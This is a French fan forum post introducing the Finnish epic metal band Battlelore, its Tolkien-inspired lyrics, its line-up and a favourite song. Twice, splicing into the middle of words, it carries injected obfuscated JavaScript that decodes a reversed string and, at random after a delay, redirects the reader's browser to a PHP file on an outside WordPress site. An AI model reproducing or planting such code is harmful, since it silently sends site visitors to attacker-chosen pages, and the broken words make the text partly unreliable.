Battlelore

Pour discuter de vos groupes favoris
Répondre
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Battlelore

Message par yami627 »

Battlelore est un groupe finl$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andais de métal épique. La musique contient des éléments de métal extrême (notamment du chant masculin très brut avec des cris, le chanteur représentant un troll ou un ogre) et de métal plus classique (du chant féminin clair, assez lyrique, la chanteuse représentant une elfe). Tous les textes traitent de peuples ou événements de la Terre du Milieu de J. R. R. Tolkien.

Membres actuels
* Kaisa Jouhki : chant clair
* Tomi Mykkänen : chant crié
* Jussi Rautio : guitare solo
* Jyri Vahvanen : guitare rythmique
* Timo Honkanen : basse
* Maria : claviers/flûte
* Henri Vahvanen : batterie

Image

Voila pour la présentation (merci Wiki :P )
C'est mon homme qui m'as fait découvrir ce groupe (faut dire que je sortais pas beaucoup avant XD) avec la chanson : Journey To Undying L$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands (une des plus... calme ? lol)

J'aime beaucoup ce groupe qui rassemble deux style musicaux que j'adore ^^
Je vous laisse découvrir Battlelore avec la même chanson que mon chéri m'as fait écouter :
http://www.youtube.com/watch?v=GOZGFoWJMFI

Image
Image
Répondre